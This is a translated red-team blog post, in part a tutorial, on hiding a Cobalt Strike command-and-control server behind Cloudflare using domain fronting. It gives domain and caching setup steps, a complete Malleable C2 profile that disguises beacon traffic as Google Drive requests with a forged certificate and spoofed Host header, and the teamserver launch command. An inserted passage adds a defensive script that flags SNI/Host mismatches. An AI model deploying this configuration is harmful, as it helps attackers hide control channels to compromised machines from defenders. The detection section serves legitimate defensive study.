Hiding C2 with domain fronting (to be continued)

Preface

During a red team engagement, if the C2 server is not given some form of protection, then every command-and-control action produces a network connection from the victim machine to the C2 server. The real IP is then easy to trace back, the C2 server is exposed, and it becomes hard to take any further action.

Domain fronting

Domain fronting (域前置, also translated as 域名幌子) is a technique for circumventing internet censorship by hiding the real endpoint of a connection. Operating at the application layer, it lets a user connect over HTTPS to a blocked service while appearing to communicate with an entirely different site.

"Domain fronting" is a censorship-circumvention technique whose main purpose is to hide the remote endpoint of a communication. It operates at the application layer and relies on HTTPS: the remote endpoint would normally be blocked, but with domain fronting the inspecting device is led to believe the traffic is going to some other legitimate address, and the check is bypassed. The core idea is to use different domain names at different layers of the same connection. In a single HTTPS request, the outer layer carries one domain name, in the DNS query and the TLS SNI (Server Name Indication), while the inner layer carries another, in the HTTP Host header. Because the Host header sits inside the TLS encryption, it is invisible to the inspecting device.
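The same two-layer mismatch described above is what a defender with TLS inspection can look for. The script below is an added example for this write-up, not code from the original post: it assumes a hypothetical inspecting proxy or sensor has already exported, per request, the SNI from the TLS ClientHello and the Host header from the decrypted HTTP request, and it flags requests whose outer and inner names belong to different registrable domains (plus the degenerate cases of a missing SNI or Host). The sample records and the tiny multi-label suffix set are constructed for illustration; a real deployment would load the full Public Suffix List.

```python
"""Detect SNI / Host-header layer mismatches, the signature of domain fronting.

Added example, not part of the original post. Assumes a TLS-inspecting sensor
(hypothetical) has exported the outer-layer SNI and the inner-layer Host header
for each request; the records below are constructed sample data.
"""
from dataclasses import dataclass
from typing import List, Optional

# Stand-in for the Public Suffix List (assumption: enough for the sample data).
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "com.cn"}


def registrable_domain(hostname: str) -> str:
    """Return the eTLD+1 of a hostname, e.g. drive.google.com -> google.com.

    Strips a trailing dot and an optional :port, then keeps the public suffix
    plus one label.
    """
    labels = hostname.lower().rstrip(".").split(":")[0].split(".")
    if len(labels) < 2:
        return hostname.lower()
    suffix_len = 2 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 1
    return ".".join(labels[-(suffix_len + 1):])


@dataclass
class Request:
    src_ip: str
    sni: str    # outer layer: exposed by DNS and the TLS ClientHello
    host: str   # inner layer: Host header, visible only after decryption
    uri: str


def classify(req: Request) -> Optional[str]:
    """Return a finding label for a suspicious request, or None if it looks normal."""
    if not req.sni:
        return "no-sni"          # ClientHello without SNI: worth a separate look
    if not req.host:
        return "no-host"         # HTTP request without a Host header
    if registrable_domain(req.sni) != registrable_domain(req.host):
        return "sni-host-mismatch"
    return None


def find_fronting(requests: List[Request]) -> List[Request]:
    """Return only the requests whose SNI and Host disagree at the registrable level."""
    return [r for r in requests if classify(r) == "sni-host-mismatch"]


# Constructed sample records. The last one mirrors the pattern in this write-up:
# the outer layer carries an operator-controlled, CDN-proxied name while the
# Host header claims drive.google.com.
SAMPLE = [
    Request("10.0.0.5", "drive.google.com", "drive.google.com", "/viewerng/meta"),
    Request("10.0.0.5", "www.example.co.uk", "cdn.example.co.uk:443", "/static/app.js"),
    Request("10.0.0.6", "", "api.example.org", "/v1/ping"),
    Request("10.0.0.7", "c2-front.example.net", "drive.google.com", "/viewerng/meta"),
]

if __name__ == "__main__":
    for r in SAMPLE:
        finding = classify(r)
        if finding:
            print(f"{finding:18} {r.src_ip} SNI={r.sni!r} Host={r.host!r} uri={r.uri}")
```

Subdomain differences within one registrable domain (www vs cdn) are deliberately not flagged, since that is normal CDN behaviour; the comparison is made at the eTLD+1 level so that only a genuinely different organisation in the inner layer raises a finding.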

Here is a diagram borrowed from another author's write-up:
[diagram: domain fronting, outer-layer domain (DNS/SNI) vs inner-layer domain (Host header)]

Domain fronting can front with a high-reputation domain such as Google or Microsoft; here I am only doing a simple practice run.

Preparation

  1. A C2 domain name
  2. A Cloudflare account
  3. A C2 server

Domain configuration

  1. Buy a domain on GoDaddy and set its NS servers to Cloudflare's addresses for resolution.
    [screenshot: GoDaddy nameserver settings]

  2. Set the corresponding A record in Cloudflare.
    [screenshot: Cloudflare DNS A record]

  3. Adjust the Cloudflare caching configuration:
    turn off Development Mode and caching.
    [screenshot: Cloudflare caching settings]

  4. Configure C2.profile.
    Here is a collection compiled by harmj0y:

    https://github.com/rsmudge/Malleable-C2-Profiles
    Here is a Google profile for reference:

    #
    # Google Drive
    #
    # Author: @bluscreenofjeff
    #

    #set https cert info
    https-certificate {
        set CN "*.google.com"; #Common Name
        set O "Google Inc"; #Organization Name
        set C "US"; #Country
        set L "Mountain View"; #Locality
        set ST "California"; #State or Province
        set validity "365"; #Number of days the cert is valid for
    }

    #default Beacon sleep duration and jitter
    set sleeptime "60000";
    set jitter "20";

    #default useragent for HTTP comms
    set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

    #IP address used to indicate no tasks are available to DNS Beacon
    set dns_idle "8.8.4.4";

    #Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_sleep "0";

    #Maximum length of hostname when uploading data over DNS (0-255)
    set maxdns "235";

    http-get {

        set uri "/viewerng/meta";

        client {

            header "Accept" "text/html,application/xml;*/*;";
            header "Accept-Encoding" "gzip, deflate";
            header "Host" "drive.google.com";
            header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

            #session metadata
            metadata {
                base64url;
                netbios;
                base64url;
                parameter "id";
            }

            parameter "u" "0";
        }

        server {
            header "Content-Type" "application/json; charset=utf-8";
            header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
            header "Pragma" "no-cache";
            header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
            header "X-Content-Type-Options" "nosniff";
            header "X-Frame-Options" "SAMEORIGIN";
            header "X-XSS-Protection" "1; mode=block";
            header "Server" "GSE";
            header "Connection" "close";

            #Beacon's tasks
            output {
                print;
            }
        }
    }

    http-post {

        set uri "/viewersng/meta";
        set verb "GET";

        client {

            header "Accept" "text/html,application/xml;*/*;";
            header "Accept-Encoding" "gzip, deflate";
            header "Host" "drive.google.com";
            header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

            output {
                base64url;
                netbios;
                base64url;
                parameter "id";
            }

            #session ID
            id {
                parameter "u";
            }
        }

        server {
            header "Content-Type" "application/json; charset=utf-8";
            header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
            header "Pragma" "no-cache";
            header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
            header "X-Content-Type-Options" "nosniff";
            header "X-Frame-Options" "SAMEORIGIN";
            header "X-XSS-Protection" "1; mode=block";
            header "Server" "GSE";
            header "Connection" "close";

            output {
                print;
            }
        }
    }

    #change the stager server
    http-stager {
        server {
            header "Content-Type" "application/json; charset=utf-8";
            header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
            header "Pragma" "no-cache";
        }
    }

    Note that every domain name in the profile file must be replaced with the C2 domain.
    [screenshot: profile with the domain names replaced]

C2 configuration

  1. Upload the modified C2.profile to the Cobalt Strike root directory and append ./C2.profile to the start command,
    for example:
    ./teamserver C2ip Password ./C2.profile
  2. Set up the listener in Cobalt Strike.
    [screenshot: Cobalt Strike listener configuration]

Final result

[screenshot: beacon check-in]

[screenshot: traffic going to the Cloudflare-proxied domain]

The C2 server is hidden successfully.